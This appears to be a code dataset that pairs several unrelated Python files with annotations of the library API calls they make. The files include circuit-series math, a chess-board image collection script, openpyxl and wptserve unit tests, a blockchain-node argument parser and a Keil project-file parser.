'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actors"""'], {}), "('leapp.repository.actor_definition.get_actors')\n", (2974, 3022), False, 'import mock\n'), ((3282, 3382), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actor_metadata"""'], {'return_value': '_FAKE_META_DATA'}), "('leapp.repository.actor_definition.get_actor_metadata',\n return_value=_FAKE_META_DATA)\n", (3292, 3382), False, 'import mock\n'), ((1026, 1071), 'pytest.raises', 'pytest.raises', (['UnsupportedDefinitionKindError'], {}), '(UnsupportedDefinitionKindError)\n', (1039, 1071), False, 'import pytest\n'), ((3405, 3495), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actors"""'], {'return_value': '[True, True]'}), "('leapp.repository.actor_definition.get_actors', return_value=[\n True, True])\n", (3415, 3495), False, 'import mock\n')] |
import numpy as np
import math
import matplotlib.pyplot as plt
U = 5 # equival a l'E
R = 2 # equival a R1
R2 = 3
P = 1.2
Vt = 0.026
Is = 0.000005
n = 200 # profunditat
Vd = np.zeros(n) # sèries
Vl = np.zeros(n)
I1 = np.zeros(n)
I1[0] = U / R # inicialització de les sèries
Vd[0] = Vt * math.log(1 + I1[0] / Is)
Vl[0] = P / I1[0]
def convVd(Vd, I, i): # convolució pel càlcul de Vd[i]
suma = 0
for k in range(1, i):
suma += k * Vd[k] * I[i - k]
return suma
def convVlI(Vl, I1, i): # convolució pel càlcul de Vl[i]
suma = 0
for k in range(i):
suma = suma + Vl[k] * I1[i - k]
return suma
for i in range(1, n): # càlcul dels coeficients
I1[i] = (1 / R + 1 / R2) * (-Vd[i - 1] - Vl[i - 1])
Vd[i] = (i * Vt * I1[i] - convVd(Vd, I1, i)) / (i * (Is + I1[0]))
Vl[i] = -convVlI(Vl, I1, i) / I1[0]
If = sum(I1)
Vdf = sum(Vd)
Vlf = sum(Vl)
print('I1: ' + str(If))
print('Vd: ' + str(Vdf))
print('Vl: ' + str(Vlf))
print('P: ' + str(Vlf * If))
Vdfinal = np.zeros(n) # per tal de veure com evoluciona la tensió del díode
for j in range(n):
Vdfinal[j] = np.sum([Vd[:(j+1)]])
print(Vdfinal)
| [
"numpy.sum",
"numpy.zeros",
"math.log"
]
| [((179, 190), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (187, 190), True, 'import numpy as np\n'), ((206, 217), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (214, 217), True, 'import numpy as np\n'), ((223, 234), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (231, 234), True, 'import numpy as np\n'), ((1015, 1026), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (1023, 1026), True, 'import numpy as np\n'), ((296, 320), 'math.log', 'math.log', (['(1 + I1[0] / Is)'], {}), '(1 + I1[0] / Is)\n', (304, 320), False, 'import math\n'), ((1118, 1138), 'numpy.sum', 'np.sum', (['[Vd[:j + 1]]'], {}), '([Vd[:j + 1]])\n', (1124, 1138), True, 'import numpy as np\n')] |
"""
Autonomous dataset collection of data for jetson nano
<NAME> - <EMAIL>
"""
import datasets
import json
from datasets import Board, ChessPiece, PieceColor, PieceType
#from realsense_utils import RealSenseCamera
import preprocessing as pr
import cv2
import pandas as pd
import os
from os.path import isfile, join
import uuid
import numpy as np
import uuid
from PIL import Image
from PIL.ExifTags import TAGS
RUN_CALIBRATION = False # Run calibration sequence or use preexisting board four corners data from config/setup.txt
BOARD_SAVE_DEST= r"board_metadata.jpeg" # Where the debug metadata board visualization image is saved (to ensure we properly setup the metadata)
TMP_DEST = "/home/spark/cv-chess/core/vision/tmp/" # Where images are temporarily saved before being uploaded to drive in a batch
LOCAL_MD_FILENAME = "local_meta.json"
LOCAL_METADATA_JSON_PATH = TMP_DEST + LOCAL_MD_FILENAME
TL = [250, 115]
BL = [250, 687]
TR = [825, 115]
BR = [825, 687]
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
def fen_to_dict(string):
name_to_num = {
'p' : 1,
'b' : 2,
'n' : 3,
'r' : 4,
'q' : 5,
'k' : 6,
}
out = {}
letters = "ABCDEFGH"
for i in range(8):
for j in range(1,9):
out[letters[i] + str(j)] = 0
string = string.split('/')
new_string = []
for s in string:
for d in s:
if d.isnumeric():
ix = s.index(d)
for i in range(int(d)-1):
s = s[0:ix] + '1' + s[ix:]
new_string.append(s)
for i in range(8, 0, -1):
for j in range(8):
if new_string[8-i][j].isnumeric():
out[letters[j] + str(i)] = 0
else:
out[letters[j] + str(i)] = name_to_num[new_string[8-i][j].lower()]
return out
def get_sorted_time_saved(images):
"""
Given a list of image filenames, return a dictionary of image filename : time written to disk pairs.
Purpose: for debugging dataset
Args:
images (list): List of image filenames
Returns:
dict: dict of image filenames
"""
image_dat = []
for image in images:
imtmp = Image.open(image)
tmp = imtmp.getexif()
image_dat.append(tmp)
dt = {}
for exifdata in image_dat:
idx = image_dat.index(exifdata)
# iterating over all EXIF data fields
for tag_id in exifdata:
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
# Add datetime field
if tag == "DateTime":
dt[images[idx]] = data
print(f"{tag:25}: {data}")
output = sorted(dt.items(), key=lambda eta: eta[1], reverse=False)
print(output)
dt = {}
for item in output:
dt[item[0]] = item[1]
with open(TMP_DEST + "datetimes.json", "w") as wr: # dump to json
json.dump(output, wr)
return output
def del_batch_from_text_file(file):
filenames = []
with open(file, "r") as rd:
for line in rd.readlines():
# parse each line for file to delete:
commaIndex = line.index(",")
filename = line[:commaIndex]
os.remove(TMP_DEST + filename)
if __name__ == "__main__":
# Initialize camera
realsense = RealSenseCamera()
"""
# Check if calibration sequence must be run
if RUN_CALIBRATION:
realsense.calibrate_board_pos()
if realsense.get_board_corners() is None:
print("Failed to run calibration. Exiting...")
exit()
"""
"""
board_meta = Board()
# Add pieces to metadata csv
board_meta.add_pieces({
"A1":ChessPiece(PieceType.KNIGHT, PieceColor.BLUE), "A2":ChessPiece(PieceType.PAWN, PieceColor.BLUE), "A3":ChessPiece(PieceType.PAWN, PieceColor.ORANGE)
})
board_meta.display_board(dest=BOARD_SAVE_DEST)
print(f"Verify board is correct output dest={BOARD_SAVE_DEST}.\nContine [Y] or Exit [E]?")
validate = input()
if validate.upper() == "E" or validate.upper() == "N":
print("Exiting...")
realsense.stop_pipeline()
exit()
files = []
files = [f for f in os.listdir(TMP_DEST) if isfile(os.path.join(TMP_DEST, f))]
# Check to see if there is pre-existing .csv metadata to add to
if LOCAL_MD_FILENAME in files:
try:
total_metadata = pd.read_csv(LOCAL_METADATA_JSON_PATH)
except:
total_metadata = pd.DataFrame()
else:
total_metadata = pd.DataFrame()
# Loop through input
while input() != "exit":
img = realsense.capture_rgb_image() # Capture the image
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
files = pr.board_to_64_files(img, base_directory=TMP_DEST) # Break image up into 64 files
piece_types, piece_colors = [], []
batch_id = uuid.uuid1()
for tile in sorted(files.keys()):
temp = board_meta.get_chess_piece(tile)
if temp is None:
piece_types.append(None)
piece_colors.append(None)
else:
piece_types.append(temp.piece_type.name)
piece_colors.append(temp.piece_color.name)
tmp_meta = pd.DataFrame({
"File" : [files[file] for file in files.keys()],
"Position" : [file for file in files.keys()],
"Piece Type" : piece_types,
"Piece Color" : piece_colors,
"Batch ID" : [batch_id for i in range(len(files.keys()))]
})
frames = [total_metadata, tmp_meta]
total_metadata = pd.concat(frames) # Concatenate dataframes
print(total_metadata)
total_metadata.to_csv(path_or_buf=LOCAL_METADATA_JSON_PATH)
"""
#pr.delete_board2_64_output(base_directory=TMP_DEST)
FEN = "5P1R/1Q1RP1P1/3R1P2/QQPPK1R1/1B1K1N2/B1R2N1B/1N2B3R/2B1BN2".upper()
last_input = None
df = pd.DataFrame()
while input() != "end":
resp = input("[n] for new fen, [anything key to take an image] >")
if resp == "new":
fen = input("Enter a FEN:").upper()
img = realsense.capture_rgb_image() # Capture the image
print("Captured image")
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
cv2.imwrite("original.jpg", img)
# Get dict of positions
temp_dict = fen_to_dict(FEN)
tiles = pr.board_to_64_files(img, temp_dict, base_directory=TMP_DEST) # Break image up into 64 files
data_frame = pd.DataFrame(tiles)
data_frame = data_frame.transpose()
frames = [df, data_frame]
df = pd.concat(frames) # Concatenate dataframe
csv_file = df.to_csv(TMP_DEST + 'my_csv.csv', header=False, index=False)
# Close streams and end pipeline
realsense.stop_pipeline()
| [
"cv2.imwrite",
"cv2.warpAffine",
"PIL.Image.open",
"PIL.ExifTags.TAGS.get",
"numpy.array",
"preprocessing.board_to_64_files",
"pandas.DataFrame",
"cv2.getRotationMatrix2D",
"pandas.concat",
"json.dump",
"os.remove"
]
| [((1065, 1114), 'cv2.getRotationMatrix2D', 'cv2.getRotationMatrix2D', (['image_center', 'angle', '(1.0)'], {}), '(image_center, angle, 1.0)\n', (1088, 1114), False, 'import cv2\n'), ((1126, 1200), 'cv2.warpAffine', 'cv2.warpAffine', (['image', 'rot_mat', 'image.shape[1::-1]'], {'flags': 'cv2.INTER_LINEAR'}), '(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n', (1140, 1200), False, 'import cv2\n'), ((6265, 6279), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (6277, 6279), True, 'import pandas as pd\n'), ((2290, 2307), 'PIL.Image.open', 'Image.open', (['image'], {}), '(image)\n', (2300, 2307), False, 'from PIL import Image\n'), ((3113, 3134), 'json.dump', 'json.dump', (['output', 'wr'], {}), '(output, wr)\n', (3122, 3134), False, 'import json\n'), ((6657, 6689), 'cv2.imwrite', 'cv2.imwrite', (['"""original.jpg"""', 'img'], {}), "('original.jpg', img)\n", (6668, 6689), False, 'import cv2\n'), ((6784, 6845), 'preprocessing.board_to_64_files', 'pr.board_to_64_files', (['img', 'temp_dict'], {'base_directory': 'TMP_DEST'}), '(img, temp_dict, base_directory=TMP_DEST)\n', (6804, 6845), True, 'import preprocessing as pr\n'), ((6907, 6926), 'pandas.DataFrame', 'pd.DataFrame', (['tiles'], {}), '(tiles)\n', (6919, 6926), True, 'import pandas as pd\n'), ((7027, 7044), 'pandas.concat', 'pd.concat', (['frames'], {}), '(frames)\n', (7036, 7044), True, 'import pandas as pd\n'), ((1019, 1047), 'numpy.array', 'np.array', (['image.shape[1::-1]'], {}), '(image.shape[1::-1])\n', (1027, 1047), True, 'import numpy as np\n'), ((2547, 2571), 'PIL.ExifTags.TAGS.get', 'TAGS.get', (['tag_id', 'tag_id'], {}), '(tag_id, tag_id)\n', (2555, 2571), False, 'from PIL.ExifTags import TAGS\n'), ((3421, 3451), 'os.remove', 'os.remove', (['(TMP_DEST + filename)'], {}), '(TMP_DEST + filename)\n', (3430, 3451), False, 'import os\n')] |
from __future__ import absolute_import
# Copyright (c) 2010-2017 openpyxl
import pytest
from openpyxl.xml.functions import fromstring, tostring
from openpyxl.tests.helper import compare_xml
@pytest.fixture
def GradientFillProperties():
from ..fill import GradientFillProperties
return GradientFillProperties
class TestGradientFillProperties:
def test_ctor(self, GradientFillProperties):
fill = GradientFillProperties()
xml = tostring(fill.to_tree())
expected = """
<gradFill></gradFill>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GradientFillProperties):
src = """
<gradFill></gradFill>
"""
node = fromstring(src)
fill = GradientFillProperties.from_tree(node)
assert fill == GradientFillProperties()
@pytest.fixture
def Transform2D():
from ..shapes import Transform2D
return Transform2D
class TestTransform2D:
def test_ctor(self, Transform2D):
shapes = Transform2D()
xml = tostring(shapes.to_tree())
expected = """
<xfrm></xfrm>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Transform2D):
src = """
<root />
"""
node = fromstring(src)
shapes = Transform2D.from_tree(node)
assert shapes == Transform2D()
| [
"openpyxl.tests.helper.compare_xml",
"openpyxl.xml.functions.fromstring"
]
| [((565, 591), 'openpyxl.tests.helper.compare_xml', 'compare_xml', (['xml', 'expected'], {}), '(xml, expected)\n', (576, 591), False, 'from openpyxl.tests.helper import compare_xml\n'), ((756, 771), 'openpyxl.xml.functions.fromstring', 'fromstring', (['src'], {}), '(src)\n', (766, 771), False, 'from openpyxl.xml.functions import fromstring, tostring\n'), ((1179, 1205), 'openpyxl.tests.helper.compare_xml', 'compare_xml', (['xml', 'expected'], {}), '(xml, expected)\n', (1190, 1205), False, 'from openpyxl.tests.helper import compare_xml\n'), ((1346, 1361), 'openpyxl.xml.functions.fromstring', 'fromstring', (['src'], {}), '(src)\n', (1356, 1361), False, 'from openpyxl.xml.functions import fromstring, tostring\n')] |
import os
import unittest
import json
import types
from http.client import BadStatusLine
from io import BytesIO
import pytest
wptserve = pytest.importorskip("wptserve")
from .base import TestUsingServer, TestUsingH2Server, doc_root
def send_body_as_header(self):
if self._response.add_required_headers:
self.write_default_headers()
self.write("X-Body: ")
self._headers_complete = True
class TestResponse(TestUsingServer):
def test_head_without_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_without_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("", resp.info()['x-body'])
def test_head_with_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.send_body_for_head_request = True
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_with_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("body", resp.info()['X-Body'])
def test_write_content_no_status_no_header(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_header", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_status(201)
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 201
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_status(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert sorted(x.lower() for x in resp.info().keys()) == sorted(['test-header', 'date', 'server', 'content-length'])
def test_write_content_no_status_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == [('test-header', 'test-value')]
def test_write_content_no_status_no_headers_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_headers_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == []
def test_write_raw_content(self):
resp_content = b"HTTP/1.1 202 Giraffe\n" \
b"X-TEST: PASS\n" \
b"Content-Length: 7\n\n" \
b"Content"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_content_file(self):
@wptserve.handlers.handler
def handler(request, response):
with open(os.path.join(doc_root, "test.asis"), 'rb') as infile:
response.writer.write_raw_content(infile)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_none(self):
@wptserve.handlers.handler
def handler(request, response):
with pytest.raises(ValueError):
response.writer.write_raw_content(None)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
self.request(route[1])
def test_write_raw_contents_invalid_http(self):
resp_content = b"INVALID HTTP"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
with pytest.raises(BadStatusLine) as e:
self.request(route[1])
assert str(e.value) == resp_content.decode('utf-8')
class TestH2Response(TestUsingH2Server):
def test_write_without_ending_stream(self):
data = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
headers = [
('server', 'test-h2'),
('test', 'PASS'),
]
response.writer.write_headers(headers, 202)
response.writer.write_data_frame(data, False)
# Should detect stream isn't ended and call `writer.end_stream()`
route = ("GET", "/h2test/test", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 202
assert [x for x in resp.headers.items()] == [('server', 'test-h2'), ('test', 'PASS')]
assert resp.content == data
def test_set_error(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_error(503, message="Test error")
route = ("GET", "/h2test/test_set_error", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 503
assert json.loads(resp.content) == json.loads("{\"error\": {\"message\": \"Test error\", \"code\": 503}}")
def test_file_like_response(self):
@wptserve.handlers.handler
def handler(request, response):
content = BytesIO(b"Hello, world!")
response.content = content
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"Hello, world!"
def test_list_response(self):
@wptserve.handlers.handler
def handler(request, response):
response.content = ['hello', 'world']
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"helloworld"
def test_content_longer_than_frame_size(self):
@wptserve.handlers.handler
def handler(request, response):
size = response.writer.get_max_payload_size()
content = "a" * (size + 5)
return [('payload_size', size)], content
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
payload_size = int(resp.headers['payload_size'])
assert payload_size
assert resp.content == b"a" * (payload_size + 5)
def test_encode(self):
@wptserve.handlers.handler
def handler(request, response):
response.encoding = "utf8"
t = response.writer.encode("hello")
assert t == b"hello"
with pytest.raises(ValueError):
response.writer.encode(None)
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
def test_raw_header_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204'),
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
def test_raw_data_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.write_status_headers()
response.writer.write_raw_data_frame(data=b'Hello world', end_stream=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.content == b'Hello world'
def test_raw_header_continuation_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204')
])
response.writer.write_raw_continuation_frame([
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
if __name__ == '__main__':
unittest.main()
| [
"json.loads",
"io.BytesIO",
"os.path.join",
"pytest.importorskip",
"pytest.raises",
"unittest.main",
"types.MethodType"
]
| [((140, 171), 'pytest.importorskip', 'pytest.importorskip', (['"""wptserve"""'], {}), "('wptserve')\n", (159, 171), False, 'import pytest\n'), ((11826, 11841), 'unittest.main', 'unittest.main', ([], {}), '()\n', (11839, 11841), False, 'import unittest\n'), ((603, 657), 'types.MethodType', 'types.MethodType', (['send_body_as_header', 'response.writer'], {}), '(send_body_as_header, response.writer)\n', (619, 657), False, 'import types\n'), ((1309, 1363), 'types.MethodType', 'types.MethodType', (['send_body_as_header', 'response.writer'], {}), '(send_body_as_header, response.writer)\n', (1325, 1363), False, 'import types\n'), ((6780, 6808), 'pytest.raises', 'pytest.raises', (['BadStatusLine'], {}), '(BadStatusLine)\n', (6793, 6808), False, 'import pytest\n'), ((8072, 8096), 'json.loads', 'json.loads', (['resp.content'], {}), '(resp.content)\n', (8082, 8096), False, 'import json\n'), ((8100, 8163), 'json.loads', 'json.loads', (['"""{"error": {"message": "Test error", "code": 503}}"""'], {}), '(\'{"error": {"message": "Test error", "code": 503}}\')\n', (8110, 8163), False, 'import json\n'), ((8309, 8334), 'io.BytesIO', 'BytesIO', (["b'Hello, world!'"], {}), "(b'Hello, world!')\n", (8316, 8334), False, 'from io import BytesIO\n'), ((6204, 6229), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (6217, 6229), False, 'import pytest\n'), ((9881, 9906), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (9894, 9906), False, 'import pytest\n'), ((5691, 5726), 'os.path.join', 'os.path.join', (['doc_root', '"""test.asis"""'], {}), "(doc_root, 'test.asis')\n", (5703, 5726), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
Copyright (c) 2017 beyond-blockchain.org.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import ArgumentParser
import sys
sys.path.extend(["../../"])
from bbc1.core.bbc_config import DEFAULT_CORE_PORT, DEFAULT_P2P_PORT
DEFAULT_SERV_ADDR = '127.0.0.1'
def parser():
usage = 'python {} [--coreport <number>] [--p2pport <number>] [--workingdir <dir>] ' \
'[--config <filename>] [--default_config <filename>] [--nodekey] [--no_nodekey] [--domain0] ' \
'[--ledgersubsystem] [--ip4addr <IP addr>] [--ip6addr <IPv6 addr>] ' \
'[--log <filename>] [--verbose_level <string>] [--daemon] [--kill] [--help]'.format(__file__)
argparser = ArgumentParser(usage=usage)
argparser.add_argument('-cp', '--coreport', type=int, default=DEFAULT_CORE_PORT, help='waiting TCP port')
argparser.add_argument('-pp', '--p2pport', type=int, default=DEFAULT_P2P_PORT, help='waiting TCP port')
argparser.add_argument('-w', '--workingdir', type=str, default=".bbc1", help='working directory name')
argparser.add_argument('-c', '--config', type=str, default=None, help='config file name')
argparser.add_argument('--default_config', type=str, default=None, help='default config file')
argparser.add_argument('--nodekey', action='store_true', help='use node_key for admin command')
argparser.add_argument('--no_nodekey', action='store_true', help='don\'t use node_key for admin command')
argparser.add_argument('--domain0', action='store_true', help='connect to domain_global_0')
argparser.add_argument('--ledgersubsystem', action='store_true', help='use ledger_subsystem')
argparser.add_argument('--ip4addr', type=str, default=None, help='IPv4 address exposed to the external network')
argparser.add_argument('--ip6addr', type=str, default=None, help='IPv6 address exposed to the external network')
argparser.add_argument('-l', '--log', type=str, default="-", help='log filename/"-" means STDOUT')
argparser.add_argument('-d', '--daemon', action='store_true', help='run in background')
argparser.add_argument('-k', '--kill', action='store_true', help='kill the daemon')
argparser.add_argument('-v', '--verbose_level', type=str, default="debug",
help='log level all/debug/info/warning/error/critical/none')
args = argparser.parse_args()
return args
| [
"sys.path.extend",
"argparse.ArgumentParser"
]
| [((646, 673), 'sys.path.extend', 'sys.path.extend', (["['../../']"], {}), "(['../../'])\n", (661, 673), False, 'import sys\n'), ((1197, 1224), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'usage': 'usage'}), '(usage=usage)\n', (1211, 1224), False, 'from argparse import ArgumentParser\n')] |
"""
Usage:
main.py [<project>]
Options:
<project> Path to the .uvprojx file (Keil® µVision5 Project File).
The .uvoptx file (Keil® µVision5 Project Options file) will
be located automatically as it shall be adjacent to the
.uvprojx file, having the same filename.
If this is a directory, .uvprojx is found automatically (if
multiple found then the latest changed is chosen).
If not provided then the current working directory is chosen
as a project directory.
"""
import enum
import operator
import os
import warnings
from collections import defaultdict
from dataclasses import dataclass
from os import DirEntry
from pathlib import Path
from typing import List, Optional, Union, Iterable, Collection, Set, Tuple, Callable, Dict, Iterator
from docopt import docopt
from lxml import etree
__author__ = "<NAME>"
UnknownInt = int
UnknownBool = bool
@enum.unique
class Language(enum.Enum):
ASM = "Assembler"
C = "C"
CPP = "C++"
@enum.unique
class FileType(enum.Enum):
C_SOURCE = 1
"""C Source file"""
ASM_SOURCE = 2
"""Assembly language file"""
OBJECT = 3
"""Object file"""
LIBRARY = 4
"""Library file"""
TEXT_DOCUMENT = 5
"""Text Document file"""
CUSTOM = 7
"""Custom file"""
CPP_SOURCE = 8
"""C++ Source file"""
IMAGE = 9
"""Image file"""
# region XML data structures for Project File
@dataclass
class Target:
@dataclass
class Toolset:
number: int
name: str
@dataclass
class Compiler:
cc: str
ac6: bool
@dataclass
class Options:
@dataclass
class Common:
device: str
vendor: str
pack_id: str
pack_url: str
cpu: str
device_id: int
register_file: str
@dataclass
class Properties:
use_cpp_compiler: bool
common: Common
properties: Properties
@dataclass
class Build:
@dataclass
class Misc:
@dataclass
class Memory:
@enum.unique
class Type(enum.Enum):
"""TODO: Real meaning unknown."""
TYPE0 = 0
TYPE1 = 1
name: str
type: Type
start: int
size: int
cpu_type: str
memories: List[Memory]
@dataclass
class C:
optimization: int
strict: bool
c99: bool
gnu: bool
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Asm:
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Linker:
text_address_range: int
data_address_range: int
misc: List[str]
misc: Misc
c: C
asm: Asm
ld: Linker
@dataclass
class File:
name: str
type: FileType
path: str
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
@dataclass
class Group:
name: str
files: List['Target.File']
name: str
toolset: Toolset
compiler: Compiler
options: Options
build: Build
groups: List[Group]
@dataclass
class RTE:
@dataclass
class TargetInfo:
@enum.unique
class VersionMatchMode(enum.Enum):
FIXED = "fixed"
name: str
version_match_mode: Optional[VersionMatchMode]
@dataclass
class Package:
name: str
url: str
vendor: str
version: str
target_infos: List['RTE.TargetInfo']
@dataclass
class Component:
class_: str
group: str
vendor: str
version: str
condition: str
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
@dataclass
class File:
@enum.unique
class Attribute(enum.Enum):
CONFIG = "config"
@enum.unique
class Category(enum.Enum):
SOURCE = "source"
attr: Attribute
category: Category
condition: Optional[str]
name: str
version: str
instance: str
component: 'RTE.Component'
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
packages: List[Package]
components: List[Component]
files: List[File]
# endregion XML data structures for Project File
# region XML data structures for Project Options file
@dataclass
class File:
group_number: int
"""Number of the :cls:`Group` this file belongs to."""
number: int
"""Number of the file (global across all groups)."""
type: FileType
"""File type as selected in the Options for File ... -> Properties dialog"""
expanded: bool
"""Whether the file is expanded (include file dependencies shown) in the Project Window file browser."""
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
tv_exp_opt_dlg: UnknownBool
dave2: UnknownBool
path: str
filename: str
rte_flag: bool
"""Whether this file is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
shared: UnknownBool
_project_file: Target.File = None
"""Reference to the instance of this file from the Project File."""
@dataclass
class Group:
name: str
"""Group name as shown in the Project Window file browser."""
expanded: bool
"""Whether the group is expanded (files shown) in the Project Window file browser."""
tv_exp_opt_dlg: UnknownBool
cb_sel: UnknownBool
rte_flag: bool
"""Whether this group is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
files: List[File]
"""List of files in this group."""
_project_group: Target.Group = None
"""Reference to the instance of this group from the Project File."""
# endregion XML data structures for Project Options file
# region XML parsing helper functions
def text(element: etree.ElementBase, name: str, is_attribute: bool = False, nullable: bool = False) -> Optional[str]:
if is_attribute:
if nullable:
return element.attrib.get(name)
else:
return element.attrib[name]
value = element.xpath(name)
if (not value) and nullable:
return None
if len(value) != 1:
raise ValueError(f"Only one '{name}' tag per tree is supported, {len(value)} found")
return value[0].text
def strict_bool(element: etree.ElementBase, name: str, nullable: bool = False, *,
false_value: str = "0", true_value: str = "1") -> Optional[bool]:
value = text(element, name, nullable=nullable)
if value == false_value:
return False
if value == true_value:
return True
if (value is None) and nullable:
return None
raise ValueError(f"'{value}' (of {name}) is not valid boolean value")
